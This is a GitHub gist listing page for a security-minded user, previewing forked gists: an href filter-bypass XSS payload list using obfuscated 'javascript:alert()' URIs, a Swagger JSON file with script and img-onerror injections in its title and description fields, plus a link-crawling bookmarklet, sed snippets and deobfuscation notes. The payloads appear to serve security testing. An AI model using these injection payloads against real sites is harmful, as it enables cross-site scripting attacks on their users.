mrrootsec
/ href_bypass.html
Created
April 10, 2025 06:15
— forked from hackerscrolls/href_bypass.html
XSS payloads for href
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!--javascript --> | |
| ja	vascript:alert(1) | |
| ja
vascript:alert(1) | |
| ja
vascript:alert(1) | |
| javascript:alert() | |
| <!--::colon:: --> | |
| javascript:alert() | |
| javascript:alert() | |
| javascript:alert(1) |
mrrootsec
/ getRawPageContent
Created
January 14, 2025 16:44
— forked from henningpohl/getRawPageContent
Bookmarklet to crawl a page for iframes, embeds and links and render those as easy to access list.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function(){ | |
| // http://coding.smashingmagazine.com/2010/05/23/make-your-own-bookmarklets-with-jquery/ | |
| // http://subsimple.com/bookmarklets/jsbuilder.htm | |
| if(window.jQuery === undefined) { | |
| var script = document.createElement("script"); | |
| script.src = "http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"; | |
| script.onload = script.onreadystatechange = function() { | |
| bookmarklet(); | |
| }; |
mrrootsec
/ python-venv-tutorial.md
Created
November 14, 2024 05:33
— forked from ryumada/python-venv-tutorial.md
Python Virtual Environment Tutorial
mrrootsec
/ ponelat-evil-xss.swagger.json
Created
September 18, 2024 15:50
— forked from shockey/ponelat-evil-xss.swagger.json
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger" : "2.0", | |
| "info" : { | |
| "version" : "1.0.100", | |
| "title" : "title<script language=\"javascript\">alert('1')</script>", | |
| "description" : "description with **markdown** format <script language=\"javascript\">alert('script-in-description')</script> <img src=x onerror=alert(\"img-in-description\")>" | |
| }, | |
| "tags" : [ { | |
| "name" : "Admin", | |
| "description" : "tag with **markdown**" |
mrrootsec
/ sed_snippets.sh
Created
July 29, 2024 14:41
— forked from r2k0/sed_snippets.sh
sed examples
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##FILE SPACING: | |
| # double space a file | |
| sed G | |
| # double space a file which already has blank lines in it. Output file | |
| # should contain no more than one blank line between lines of text. | |
| sed '/^$/d;G' | |
| # triple space a file |
mrrootsec
/ _deobfuscating-unminifying-obfuscated-web-app-code.md
Created
April 12, 2024 02:56
— forked from 0xdevalias/_deobfuscating-unminifying-obfuscated-web-app-code.md
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code